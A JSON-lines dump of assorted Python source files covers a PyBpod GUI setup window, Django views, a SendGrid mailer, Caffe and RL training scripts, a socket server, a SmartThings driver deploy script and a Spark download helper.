seealso::\n :py:class:`pybpodgui_api.models.session.session_base.SessionBase`.\n \"\"\"\n return Session(self)\n\n @property\n def name(self):\n return self._name.value\n\n @name.setter\n def name(self, value):\n self._update_name = True # Flag to avoid recurse calls when editing the name text field\n self._name.value = value\n self._update_name = False\n # Update the session windows names\n if hasattr(self, 'sessions'):\n for session in self.sessions:\n session.name = session.name\n\n @property\n def board(self):\n if isinstance(self._board.value, str) or isinstance(self._board.value, int): return None\n return self._board.value\n\n @board.setter\n def board(self, value):\n if isinstance(value, str):\n value = self.project.find_board(value)\n self._update_board = True # Flag to avoid recurse calls when editing the name text field\n\n if value not in self._board.values:\n self.reload_boards()\n self._board.value = value\n del self._update_board\n Setup.board.fset(self, value)\n\n @property\n def task(self):\n if isinstance(self._task.value, str) or isinstance(self._task.value, int):\n return None\n return self._task.value\n\n @task.setter\n def task(self, value):\n if isinstance(value, str):\n value = self.project.find_task(value)\n\n self._update_task = True # Flag to avoid recurse calls when editing the name text field\n\n if value not in self._task.values:\n self.reload_tasks()\n\n self._task.value = value\n del self._update_task\n Setup.task.fset(self, value)\n\n @property\n def detached(self): return self._detached.value\n @detached.setter\n def detached(self, value): self._detached.value = value\n\n\n# Execute the application\nif __name__ == \"__main__\":\n app.start_app(SetupWindow)\n","sub_path":"pybpodgui_plugin/models/setup/setup_window.py","file_name":"setup_window.py","file_ext":"py","file_size_in_byte":13638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"564050742","text":"from collections import defaultdict\r\n\r\n\r\nclass Blog:\r\n\r\n def __init__(self, title, posts=None):\r\n self.title = title\r\n self.entries = posts if posts is not None else []\r\n\r\n def append(self, post):\r\n self.entries.append(post)\r\n\r\n def by_tag(self):\r\n tag_index = defaultdict(list)\r\n for post in self.entries:\r\n for tag in post.tags:\r\n tag_index[tag].append(post.as_dict())\r\n return tag_index\r\n\r\n def as_dict(self):\r\n return dict(\r\n title=self.title,\r\n underline=\"=\" * len(self.title),\r\n entries=[p.as_dict() for p in self.entries])\r\nif __name__ == \"__main__\":\r\n from chapter9.post import Post\r\n import datetime\r\n import json\r\n travel_x = Blog(\"Travel\")\r\n travel_x.append(\r\n Post(date=datetime.datetime(2013, 11, 14, 17, 25),\r\n title=\"Hard Aground\",\r\n rst_text=\"\"\"Some embarrassing revelation. Including ☹ and ⚓\"\"\",\r\n tags=(\"#RedRanger\", \"#Whitby42\", \"#ICW\"),\r\n )\r\n )\r\n travel_x.append(\r\n Post(date=datetime.datetime(2013, 11, 18, 15, 30),\r\n title=\"Anchor Follies\",\r\n rst_text=\"\"\"Some witty epigram. 
Including < & > characters.\"\"\",\r\n tags=(\"#RedRanger\", \"#Whitby42\", \"#Mistakes\"),\r\n )\r\n )\r\n print(travel_x.by_tag())\r\n print(\"Less elegant\")\r\n print(json.dumps(travel_x.as_dict(), indent=4))\r\n","sub_path":"chapter9/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"625002541","text":"from django.views.generic import ListView, DetailView, CreateView\nfrom .models import Gamecode, Platform, Slider\n\nclass GamecodeListing(ListView):\n model = Gamecode\n \nclass GamecodeDetail(DetailView):\n model = Gamecode\n\nclass PlatformListing(ListView):\n model = Platform\n\n \nclass PlatformDetail(DetailView):\n model = Platform\n \n\nclass GamecodeView(CreateView):\n\tmodel = Gamecode\n\tsuccess_url = '/sent'\n\nclass Slider(ListView):\n\tmodel = Slider\n\n\n","sub_path":"gamecheap/apps/sell/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"255704731","text":"import os\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import Mail, From, To, Subject, PlainTextContent, HtmlContent\nimport config\n\nclass Mailer:\n def __init__(self):\n self.__sg = SendGridAPIClient(config.send_grid_api_key)\n\n def send_email_base(self, from_email, to_emails, subject, html_content):\n message = Mail(from_email=From(from_email),\n to_emails=[To(to_email) for to_email in to_emails],\n subject=Subject(subject),\n html_content=HtmlContent(html_content))\n return self.__sg.send(message)\n\n def send_email_to_me(self, subject, html_content):\n return self.send_email_base(\n from_email='nanazhoushop@gmail.com',\n to_emails=['nanazhouh@gmail.com'],\n subject=subject,\n html_content=html_content) \n\n def send_email(self, product, action, timestamp):\n time = '{} PT'.format(timestamp.strftime(\"%Y-%m-%d, %H:%M:%S\"))\n pattern = product['pattern']\n color = product['color']\n url = product['url']\n has_image = False\n if len(product['images']) > 0:\n has_image = True\n image = product['images'][0]\n\n subject = 'Hermes US {} {} - {} at {}'.format(action, pattern, color, time)\n if has_image:\n html_content = '''\n <div>\n <a href='{}' style='font-size:14px; font-weight:bold; color:black; text-decoration: none;'>\n {} - {}\n </a>\n </div>\n <br/>\n <div>\n <a href='{}'><img src='{}' /></a>\n </div>\n '''.format(url, pattern, color, url, image)\n else:\n html_content = '''\n <div>\n <a href='{}' style='font-size:14px; font-weight:bold; color:black; text-decoration: none;'>\n {} - {}\n </a>\n </div>\n '''.format(url, pattern, color)\n\n self.send_email_to_me(subject=subject, html_content=html_content)\n","sub_path":"mailer.py","file_name":"mailer.py","file_ext":"py","file_size_in_byte":2129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"452715472","text":"import caffe\nimport matplotlib.pyplot as plt\nimport time as timelib\nimport pdb\n\ncaffe.set_mode_gpu()\ncaffe.set_device(1)\n\nsolver = caffe.get_solver('/media/ys/1a32a0d7-4d1f-494a-8527-68bb8427297f/End_to_End/caffe/solver.prototxt')\n#solver.net.copy_from('/media/ys/1a32a0d7-4d1f-494a-8527-68bb8427297f/End_to_End/caffe/weight/nvidia/nvidia_00001_iter_5000.caffemodel')\n#solver.net.copy_from('/media/ys/1a32a0d7-4d1f-494a-8527-68bb8427297f/Data/train/checkpoint-sdc-ch2.data-00000-of-00001.caffemodel')\nmax_iter = 800000\nfig, 
axes = plt.subplots()\nfig.show()\nloss = 0\nloss_list = []\niter0 = solver.iter\nepoch = 0\n\nwhile solver.iter < max_iter:\n\n# net_full_conv.save('./copy_vgg.caffemodel')\n solver.step(1)\n #if solver.iter == 3000:\n #\tpdb.set_trace()\n# if solver.iter % 100 == 0:\n# \tpdb.set_trace()\n #pdb.set_trace()\n #if solver.iter % 500 ==0:\n label = solver.net.blobs['label'].data \n out = solver.net.blobs['fc10'].data\n #pdb.set_trace()\n loss = solver.net.blobs['loss'].data.flatten()\n if loss > 30:\n \tloss = 30\n loss_list.append(loss) \n if solver.iter % 100 == 0:\n axes.clear()\n axes.plot(range(iter0, iter0+len(loss_list)), loss_list)\n# axes.grid(True)\n fig.canvas.draw()\n plt.pause(0.01)\n\nfig.savefig('fig_iter_%d.png' % solver.iter)","sub_path":"caffe_code/nvidia/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"588896990","text":"import os.path\nimport torch\nfrom copy import deepcopy\n\nif os.path.exists(\"Sequence_Formers\"): # check if we are in the folder Continual_Learning_Data_Former\n from data_utils import load_data, check_and_Download_data\nelse:\n from ..data_utils import load_data, check_and_Download_data\n\n'''\nParent Class for Sequence Formers \n'''\n\nclass Sequence_Former(object):\n def __init__(self, args):\n super(Sequence_Former, self).__init__()\n\n self.n_tasks = args.n_tasks\n self.num_classes = args.num_classes\n self.i = args.i\n self.o = args.o\n self.imageSize = args.imageSize\n self.img_channels = args.img_channels\n self.dataset = args.dataset\n self.path_only = args.path_only # only valid for core50 at the moment\n self.task = args.task\n\n # if self.path_only we don't load data but just path\n # data will be loaded online while learning\n # it is considered as light mode this continual dataset are easy to generate and load\n if self.path_only:\n light_id='_light'\n else:\n light_id=''\n\n if not os.path.exists(args.o):\n os.makedirs(args.o)\n\n self.o_train = os.path.join(self.o, '{}_{}_train{}.pt'.format(self.task, self.n_tasks, light_id))\n self.o_valid = os.path.join(self.o, '{}_{}_valid{}.pt'.format(self.task, self.n_tasks, light_id))\n self.o_test = os.path.join(self.o, '{}_{}_test{}.pt'.format(self.task, self.n_tasks, light_id))\n\n\n self.o_train_full = os.path.join(self.o, '{}_1-{}_train{}.pt'.format(self.task, self.n_tasks,light_id))\n self.o_valid_full = os.path.join(self.o, '{}_1-{}_valid{}.pt'.format(self.task, self.n_tasks,light_id))\n self.o_test_full = os.path.join(self.o, '{}_1-{}_test{}.pt'.format(self.task, self.n_tasks,light_id))\n\n check_and_Download_data(self.i, self.dataset, task=self.task)\n\n def select_index(self, ind_task, y):\n \"\"\"\n This function help to select data in particular if needed\n :param ind_task: task index in the sequence\n :param y: data label\n :return: class min, class max, and index of data to keep\n \"\"\"\n return 0, self.num_classes - 1, torch.arange(len(y))\n\n def transformation(self, ind_task, data):\n \"\"\"\n Apply transformation to data if needed\n :param ind_task: task index in the sequence\n :param data: data to process\n :return: data post processing\n \"\"\"\n if not ind_task < self.num_classes:\n raise AssertionError(\"Error in task indice\")\n return deepcopy(data)\n\n def label_transformation(self, ind_task, label):\n \"\"\"\n Apply transformation to label if needed\n :param ind_task: task index in the sequence\n :param label: label to process\n :return: data 
post processing\n \"\"\"\n if not ind_task < self.num_classes:\n raise AssertionError(\"Error in task indice\")\n return label\n\n @staticmethod\n def get_valid_ind(i_tr):\n # it is time to taxe train for validation\n len_valid = int(len(i_tr) * 0.2)\n indices = torch.randperm(len(i_tr))\n\n valid_ind = indices[:len_valid]\n train_ind = indices[len_valid:]\n\n i_va = i_tr[valid_ind]\n i_tr = i_tr[train_ind]\n\n return i_tr, i_va\n\n\n def create_task(self, ind_task, x_tr, y_tr, x_te, y_te):\n\n # select only the good classes\n class_min, class_max, i_tr = self.select_index(ind_task, y_tr)\n _, _, i_te = self.select_index(ind_task, y_te)\n\n i_tr, i_va = self.get_valid_ind(i_tr)\n\n x_tr_t = self.transformation(ind_task, x_tr[i_tr])\n x_va_t = self.transformation(ind_task, x_tr[i_va])\n x_te_t = self.transformation(ind_task, x_te[i_te])\n\n y_tr_t = self.label_transformation(ind_task, y_tr[i_tr])\n y_va_t = self.label_transformation(ind_task, y_tr[i_va])\n y_te_t = self.label_transformation(ind_task, y_te[i_te])\n\n return class_min, class_max, x_tr_t, y_tr_t, x_va_t, y_va_t, x_te_t, y_te_t\n\n\n def formating_data(self):\n\n # variable to save the sequence\n tasks_tr = []\n tasks_va = []\n tasks_te = []\n\n\n # variable to save the cumul of the sequence for upperbound\n tasks_tr_full = []\n tasks_va_full = []\n tasks_te_full = []\n full_x_tr, full_y_tr = None, None\n full_x_va, full_y_va = None, None\n full_x_te, full_y_te = None, None\n\n x_tr, y_tr, x_te, y_te = load_data(self.dataset, self.i, self.imageSize, self.path_only)\n\n for ind_task in range(self.n_tasks):\n\n c1, c2, x_tr_t, y_tr_t, x_va_t, y_va_t, x_te_t, y_te_t = self.create_task(ind_task, x_tr, y_tr, x_te, y_te)\n\n tasks_tr.append([(c1, c2), x_tr_t, y_tr_t])\n tasks_va.append([(c1, c2), x_va_t, y_va_t])\n tasks_te.append([(c1, c2), x_te_t, y_te_t])\n\n if ind_task == 0:\n full_x_tr = x_tr_t\n full_x_va = x_va_t\n full_x_te = x_te_t\n full_y_tr = y_tr_t\n full_y_va = y_va_t\n full_y_te = y_te_t\n else:\n full_x_tr = torch.cat([full_x_tr, x_tr_t], dim=0)\n full_x_va = torch.cat([full_x_va, x_va_t], dim=0)\n full_x_te = torch.cat([full_x_te, x_te_t], dim=0)\n full_y_tr = torch.cat([full_y_tr, y_tr_t], dim=0)\n full_y_va = torch.cat([full_y_va, y_va_t], dim=0)\n full_y_te = torch.cat([full_y_te, y_te_t], dim=0)\n\n\n if not self.path_only:\n print(tasks_tr[0][1].shape)\n print(tasks_tr[0][1].mean())\n print(tasks_tr[0][1].std())\n\n torch.save(tasks_tr, self.o_train)\n torch.save(tasks_va, self.o_valid)\n torch.save(tasks_te, self.o_test)\n\n\n tasks_tr_full.append([(0, self.num_classes), full_x_tr, full_y_tr])\n tasks_va_full.append([(0, self.num_classes), full_x_va, full_y_va])\n tasks_te_full.append([(0, self.num_classes), full_x_te, full_y_te])\n\n torch.save(tasks_tr_full, self.o_train_full)\n torch.save(tasks_va_full, self.o_valid_full)\n torch.save(tasks_te_full, self.o_test_full)\n","sub_path":"Sequence_Formers/sequence_former.py","file_name":"sequence_former.py","file_ext":"py","file_size_in_byte":6263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"377662416","text":"#!/usr/bin/python\n#-*- coding: utf-8 -*-\n\n# __author__ = '330mlcc'\n#\n# import socket\n# import time\n# import threading\n#\n# def tcplink(sock,addr):\n# print('accetp new connection for %s:5S...' 
% addr)\n# sock.send('welcome!'.encode())\n# while True:\n# data = socket.recv(1024)\n# time.sleep(5)\n#\n# if data == 'exit' or not data:\n# break\n#\n# sock.send('hello : '.encode()+data)\n#\n# socket.close()\n# print('Connection from %s:%s' % addr)\n#\n# s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n#\n# s.bind(('127.0.0.1',9001))\n#\n# s.listen(5)\n#\n# print('waiting for connection....')\n#\n# while True:\n# sock,addr = s.accept()\n# t = threading.Thread(target=tcplink(),args=(socket,addr))\n# t.start()\n\nimport socket\nimport time\n\nhost = '' #host设定为空,表示可以与任何ip的socket在端口9001通信\nport = 9001\nbufsize = 1024\n\nquit = False\nshutdown = False\n\naddr = (host,port)\n\n##设置socket,AF_INET表示是IPV4标准,SOCK_STREAM是TCP传输协议\ntcpConnServers = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ntcpConnServers.bind(addr)\ntcpConnServers.listen(1)\n\nwhile True: #与客户端建立连接之后,获取客户端传来的数据\n print('watting for connection...')\n tcpConnClients,ddr = tcpConnServers.accept() # 不断监听获取新的客户端连接\n print('connected from : ', addr)\n\n while True:\n data = tcpConnClients.recv(bufsize)\n data = data.decode('utf-8')\n\n if not data:\n break\n\n ss = '[%s] %s' % (time.time(),data)\n print(ss)\n\n if data == 'bye':\n quit = True\n break\n elif data == 'shutdown':\n shutdown = True\n break\n print('server has been closed')\n\nif __name__ == '__main__':\n pass\n\n","sub_path":"src/reading/network/charpt1/fromExaSocketServer.py","file_name":"fromExaSocketServer.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"383195201","text":"import os, subprocess, requests, json, time, yaml, hashlib\n\nENVIRONMENT_URL = os.environ.get('ENVIRONMENT_URL')\nUPLOAD_URL = ENVIRONMENT_URL+\"/drivers/package\"\nCHANNEL_ID = os.environ.get('CHANNEL_ID')\nUPDATE_URL = ENVIRONMENT_URL+\"/channels/\"+CHANNEL_ID+\"/drivers/bulk\"\nTOKEN = os.environ.get('TOKEN')\nDRIVERID = \"driverId\"\nVERSION = \"version\"\nARCHIVEHASH = \"archiveHash\"\n\n# Make sure we're running in the root of the git directory\na = subprocess.run([\"git\", \"rev-parse\", \"--show-toplevel\"], capture_output=True)\nos.chdir(a.stdout.decode().strip()+\"/drivers/SmartThings/\")\n\n# Get list of all SmartThings driver folders\ndrivers = [driver.name for driver in os.scandir('.') if driver.is_dir()]\ndriver_updates = []\ndrivers_updated = []\nuploaded_drivers = {}\n\n# Get drivers currently on the channel\nresponse = requests.get(\n ENVIRONMENT_URL+\"/drivers\",\n headers={\n \"Accept\": \"application/vnd.smartthings+json;v=20200810\",\n \"Authorization\": \"Bearer \"+TOKEN\n }\n)\nif response.status_code != 200:\n print(\"Failed to retrieve channel's current drivers\")\n print(\"Error code: \"+str(response.status_code))\n print(\"Error response: \"+response.text)\nelse:\n response_json = json.loads(response.text)[\"items\"]\n for driver in response_json:\n if ARCHIVEHASH in driver.keys() and VERSION in driver.keys() and DRIVERID in driver.keys():\n uploaded_drivers[driver[\"packageKey\"]] = {DRIVERID: driver[DRIVERID], VERSION: driver[VERSION], ARCHIVEHASH: driver[ARCHIVEHASH]}\n\n# For each driver, first package the driver locally, then upload it\n# after it's been uploaded, hold on to the driver id and version\nfor driver in drivers:\n subprocess.run([\"rm\", \"edge.zip\"], capture_output=True)\n package_key = \"\"\n with open(driver+\"/config.yml\", 'r') as config_file:\n package_key = yaml.safe_load(config_file)[\"packageKey\"]\n print(package_key)\n 
subprocess.run([\"zip -r ../edge.zip $(find . -name \\\"*.yml\\\" -o -name \\\"*.lua\\\" -o -name \\\"*.yaml\\\") -X -x \\\"*test*\\\"\"], cwd=driver, shell=True, capture_output=True)\n with open(\"edge.zip\", 'rb') as driver_package:\n data = driver_package.read()\n # TODO: This does not yet work, hash returned by server does not match\n hash = hashlib.sha256(data).hexdigest()\n response = None\n retries = 0\n if package_key not in uploaded_drivers.keys() or hash != uploaded_drivers[package_key][\"archiveHash\"]: \n while response == None or (response.status_code == 500 or response.status_code == 429):\n response = requests.post(\n UPLOAD_URL, \n headers={\n \"Content-Type\": \"application/zip\", \n \"Accept\": \"application/vnd.smartthings+json;v=20200810\",\n \"Authorization\": \"Bearer \"+TOKEN,\n \"X-ST-LOG-LEVEL\": \"TRACE\"},\n data=data)\n if response.status_code != 200:\n print(\"Failed to upload driver \"+driver)\n print(\"Error code: \"+str(response.status_code))\n print(\"Error response: \"+response.text)\n if response.status_code == 500 or response.status_code == 429:\n retries = retries + 1\n if retries > 3:\n break # give up\n if response.status_code == 429:\n time.sleep(10)\n else:\n print(\"Uploaded package successfully: \"+driver)\n drivers_updated.append(driver)\n response_json = json.loads(response.text)\n driver_updates.append({DRIVERID: response_json[DRIVERID], VERSION: response_json[VERSION]})\n time.sleep(5)\n else:\n print(\"Hash matched existing driver for \"+package_key)\n # hash matched, use the currently uploaded version of the driver to \"update\" the channel\n driver_updates.append({DRIVERID: uploaded_drivers[package_key][DRIVERID], VERSION: uploaded_drivers[package_key][VERSION]}) \n\nresponse = requests.put(\n UPDATE_URL,\n headers={\n \"Accept\": \"application/vnd.smartthings+json;v=20200810\",\n \"Authorization\": \"Bearer \"+TOKEN,\n \"Content-Type\": \"application/json\",\n \"X-ST-LOG-LEVEL\": \"TRACE\"\n },\n data=json.dumps(driver_updates)\n)\nif response.status_code != 204:\n print(\"Failed to bulk update drivers\")\n print(\"Error code: \"+str(response.status_code))\n print(\"Error response: \"+response.text)\n exit(1)\n\nprint(\"Successfully bulk-updated channel: \")\nprint(drivers_updated)","sub_path":"tools/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":4290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"308290330","text":"import os\nimport sys\nimport sqlite3\n\n# Existenz feststellen\nif os.path.exists(\"firma_SQLite_10.db\"):\n print(\"Datei bereits vorhanden\")\n sys.exit(0)\n\n# Verbindung zur Datenbank erzeugen\nconnection = sqlite3.connect(\"firma_SQLite_10.db\")\n\n# Datensatz-Cursor erzeugen\ncursor = connection.cursor()\n\n# Tabelle erzeugen\nsql = \"CREATE TABLE personen(\" \\\n \"name TEXT, \" \\\n \"vorname TEXT, \" \\\n \"personalnummer INTEGER PRIMARY KEY, \" \\\n \"gehalt REAL, \" \\\n \"waehrung TEXT, \" \\\n \"geburtstag TEXT)\"\ncursor.execute(sql)\n\n# Datensatz erzeugen\nsql = \"INSERT INTO personen VALUES('Maier', \" \\\n \"'Hans', 6714, 3500.00,'€', '15.03.1962')\"\ncursor.execute(sql)\nconnection.commit()\n\n# Datensatz erzeuegen\nsql = \"INSERT INTO personen VALUES('Schmitz', \" \\\n \"'Peter', 81343, 3750.00,'€', '12.04.1958')\"\ncursor.execute(sql)\nconnection.commit()\n\n# Datensatz erzeuegen\nsql = \"INSERT INTO personen VALUES('Mertens', \" \\\n \"'Julia', 2297, 3621.50,'€', '30.12.1959')\"\ncursor.execute(sql)\nconnection.commit()\n\n# 
Verbindung beenden\nconnection.close()\n","sub_path":"exercise/sqlite_erzeugen_10_1.py","file_name":"sqlite_erzeugen_10_1.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"574196997","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: Jiyuan Zhou\n\nEnable an agent to follow a hard coded trajectory in the form of\na square with rounded corners using trained straight and circle models.\n\"\"\"\nimport argparse\nimport cProfile\nimport pstats\nimport sys\nimport time\nimport math\nimport yaml\n\nimport joblib\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom rllab.misc import tensor_utils\n\nfrom aa_simulation.envs.renderer import _Renderer\n\n\ndef render(renderer, state, action):\n \"\"\"\n Render simulation environment.\n \"\"\"\n renderer.update(state, action)\n\n\ndef modify_state_curve(state, move_param):\n \"\"\"\n Convert state [x, y, yaw, x_dot, y_dot, yaw_dot] to\n [dx, theta, ddx, dtheta]\n \"\"\"\n x_0, y_0, r = move_param\n x, y, yaw, x_dot, y_dot, yaw_dot = state\n\n x -= x_0\n y -= y_0\n\n dx = np.sqrt(np.square(x) + np.square(y)) - r\n theta = _normalize_angle(np.arctan2(-x, y) + np.pi - yaw)\n ddx = x/(x**2 + y**2)**0.5*x_dot + y/(x**2 + y**2)**0.5*y_dot\n dtheta = x/(x**2 + y**2)*x_dot - y/(x**2 + y**2)*y_dot - yaw_dot\n\n return np.array([dx, theta, ddx, dtheta])\n\n\ndef _normalize_angle(angle):\n \"\"\"\n Normalize angle to [-pi, pi).\n \"\"\"\n angle = angle % (2*np.pi)\n if (angle >= np.pi):\n angle -= 2*np.pi\n return angle\n\n\ndef _normalize_angle2(angle):\n \"\"\"\n Normalize angle to [0, 2 * pi).\n \"\"\"\n angle = angle % (2*np.pi)\n return angle\n\n\ndef modify_state_straight(state, move_param):\n \"\"\"\n Add target direction and target velocity to state, to feed\n in the NN.\n \"\"\"\n x_0, y_0, target_dir = move_param\n x, y, yaw, x_dot, y_dot, dyaw = state\n target_dir = _normalize_angle2(target_dir)\n\n new_x, new_y = _cal_distance(x, y, move_param)\n yaw = _normalize_angle2(yaw) - target_dir\n yaw = _normalize_angle(yaw)\n\n new_x_dot = x_dot * np.cos(target_dir) + y_dot * np.sin(target_dir)\n new_y_dot = y_dot * np.cos(target_dir) - x_dot * np.sin(target_dir)\n\n return np.array([new_y, yaw, new_x_dot, new_y_dot, dyaw])\n\n\ndef _cal_distance(x, y, move_param):\n # For arbitrary trajectory.\n init_x, init_y, target_dir = move_param\n\n # if _normalize_angle(target_dir) == math.pi / 2:\n # next_x, next_y = init_x, init_y + 1\n # print(1)\n # return(0, - x + init_x)\n # elif _normalize_angle(target_dir) == -math.pi / 2:\n # next_x, next_y = init_x, init_y - 1\n # return(0, x - init_x)\n # else:\n # next_x, next_y = init_x + 1, init_y + np.tan(target_dir)\n\n #print(\"x,y\", x, y, init_x, init_y)\n position_dir = np.arctan2((y - init_y), (x - init_x))\n projection_dir = _normalize_angle(position_dir - target_dir)\n #print(\"yaws\", position_dir, target_dir, projection_dir)\n dist = np.sqrt(np.square(x - init_x) + np.square(y - init_y))\n # new_y = np.absolute((next_y - init_y) * init_x + (init_x - next_x) * init_y\\\n # - init_x * next_y + next_x * init_y) / \\\n # np.sqrt(np.square(next_y - init_y) + np.square(next_x - init_x))\n\n new_y = dist * np.sin(projection_dir)\n # new_x = dist * np.cos(projection_dir)\n new_x = 0\n # new_y = (y - init_y) * np.cos(target_dir) - (x - init_x) * np.sin(target_dir)\n #print(\"new y: \", new_y)\n # if (np.sin(projection_dir < 0)):\n # new_y = new_y\n\n return (new_x, new_y)\n\ndef 
_check_point(state, way_point):\n # Potential bug!!! Can only follow a curve that is less than\n # 180 degrees! must be deal with in the hard coded trajectory\n # or higher level planner for the time being.\n x, y, _, _, _, _ = state\n check_point_x, check_point_y, direction = way_point\n direction = np.deg2rad(direction)\n\n state_direction = np.arctan2((y - check_point_y), (x - check_point_x))\n\n intersect_angle = _normalize_angle(state_direction - direction)\n\n return np.absolute(intersect_angle) <= math.pi / 2\n # return True\n\n\ndef rollout(env, agent, way_point=[], animated=False, speedup=1,\n always_return_paths=False, renderer=None, state=np.zeros(6),\n isCurve=False, move_param=[]):\n observations = []\n actions = []\n rewards = []\n agent_infos = []\n env_infos = []\n\n path_length = 0\n\n # update initial state!!!\n # Bad implementation. Just temporary.\n env._wrapped_env._state = state\n\n # if not isCurve:\n # print(\"Start straight state: \", state)\n # tmp = modify_state_straight(state, move_param)\n # tmp_a, _ = agent.get_action(tmp)\n # print(\"Start projection: \", tmp)\n # print(\"Corresponding action: \", tmp_a)\n ttt = 20\n\n while _check_point(state, way_point):\n ttt -= 1\n # print(\"State: \", state)\n # State observation convertion\n if isCurve:\n o = modify_state_curve(state, move_param)\n else:\n o = modify_state_straight(state, move_param)\n #\n a, agent_info = agent.get_action(o)\n next_o, r, d, env_info = env.step(a)\n #\n\n print(\"Start straight state: \", state)\n print(\"Start projection: \", o)\n print(\"Corresponding action: \", a)\n print()\n\n observations.append(env.observation_space.flatten(o))\n rewards.append(r)\n actions.append(env.action_space.flatten(a))\n agent_infos.append(agent_info)\n env_infos.append(env_info)\n\n path_length += 1\n if d:\n break\n\n o = next_o\n # Bad implementation. 
Just temporary.\n state = env._wrapped_env._state\n\n if animated:\n render(renderer, state, a)\n #env.render()\n timestep = 0.0001\n time.sleep(timestep / speedup)\n return state\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('--speedup', type=float, default=100000,\n help='Speedup')\n parser.add_argument('--render', dest='render',\n action='store_true', help='Rendering')\n parser.add_argument('--no-render', dest='render',\n action='store_false', help='Rendering')\n parser.set_defaults(render=True)\n args = parser.parse_args()\n return args\n\n\ndef move(env, policy, args, way_point, renderer,\\\n state, isCurve, move_param):\n final_state = rollout(env, policy, way_point=way_point,\n animated=args.render, speedup=args.speedup,\n always_return_paths=True, renderer=renderer,\n state=state, isCurve=isCurve,\\\n move_param=move_param)\n return final_state\n\n\ndef init_render():\n stream = open('aa_simulation/envs/model_params.yaml', 'r')\n params = yaml.load(stream)\n obstacles = []\n goal = None\n return _Renderer(params, obstacles, goal, None)\n\n\ndef _check_curve_way_point(curve_param, way_point):\n center_x, center_y, curve_angle = curve_param\n curve_angle = _normalize_angle(curve_angle)\n\n if curve_angle <= math.pi / 2:\n return curve_param, way_point\n\n check_point_x, check_point_y, direction = way_point\n\n # Construct new way point\n\n\ndef main():\n args = parse_arguments()\n profiler = cProfile.Profile()\n\n data_curve = joblib.load(\"data/roundedsquare_demo/circle.pkl\")\n policy_curve = data_curve['policy']\n env_curve = data_curve['env']\n\n data_straight = joblib.load(\"data/roundedsquare_demo/straight.pkl\")\n policy_straight = data_straight['policy']\n env_straight = data_straight['env']\n\n plt.ion()\n\n # Set fixed random seed\n np.random.seed(100)\n\n # Sample one rollout\n profiler.enable()\n\n renderer = init_render()\n\n state = [-1, 0, np.deg2rad(-90), 0, 0.5, 0]\n render(renderer, state, None)\n\n # center positin x, center position y, radius\n curve_params = [[0, 0, 1], [2, 0, 1], [2, 2, 1], [0, 2, 1]]\n # start position x, start position y, target start yaw(direction)\n straight_params = [[0, -1, np.deg2rad(0)], [3, 0, np.deg2rad(90)],\\\n [2, 3, np.deg2rad(-180)], [-1, 2, np.deg2rad(-90)]]\n # curve_step_size = [43, 44, 44, 44]\n # straight_step_size = [54, 55, 55, 56]\n\n way_points = [[0, -1, 180], [2, -1, 180], [3, 0, -90], [3, 2, -90],\\\n [2, 3, 0], [0, 3, 0], [-1, 2, 90], [-1, 0, 90]]\n\n point = 0\n for i in range(400):\n\n i %= 4\n # Turn left for 90 degrees\n point %= 8\n state = move(env_curve, policy_curve, args,\\\n way_points[point], renderer, state,\\\n True, curve_params[i])\n # print(state)\n point += 1\n\n # Move straightly for length 2\n point %= 8\n state = move(env_straight, policy_straight, args,\\\n way_points[point], renderer, state,\\\n False, straight_params[i])\n # print(state)\n point += 1\n\n profiler.disable()\n\n # Block until key is pressed\n sys.stdout.write(\"Press <enter> to continue: \")\n input()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"demos/test_rounded_square.py","file_name":"test_rounded_square.py","file_ext":"py","file_size_in_byte":8950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"360306574","text":"import sys\nimport os\nimport urllib\nimport tarfile\nimport hashlib\n\ndef download_spark():\n bytes_written = 0\n spark_url = \"http://eecs.berkeley.edu/~jegonzal/cs186_spark.tar.bz2\"\n if not 
os.path.exists(\"cs186_spark.tar.bz2\"):\n print(\"Downloading Spark\")\n resp = urllib.urlopen(spark_url)\n output = open('cs186_spark.tar.bz2','wb')\n block_len = 524288\n buf = resp.read(block_len)\n while buf:\n output.write(buf)\n bytes_written += len(buf)\n buf = resp.read(block_len)\n output.close()\n return bytes_written\n \ndef unzip_spark():\n if not (os.path.isdir(\"cs186_spark\") and os.path.exists(\"cs186_spark\")):\n print(\"Extracting Spark\")\n tfile = tarfile.open('cs186_spark.tar.bz2', 'r:bz2')\n tfile.extractall()\n tfile.close()\n \ndef setup_environment():\n download_spark()\n unzip_spark()\n sys.path.append(os.path.join(os.getcwd(), 'cs186_spark', 'python', 'lib', 'pyspark.zip'))\n sys.path.append(os.path.join(os.getcwd(), 'cs186_spark', 'python', 'lib', 'py4j-0.9-src.zip'))\n os.environ[\"SPARK_HOME\"] = os.path.join(os.getcwd(), 'cs186_spark')\n\n\n \n# 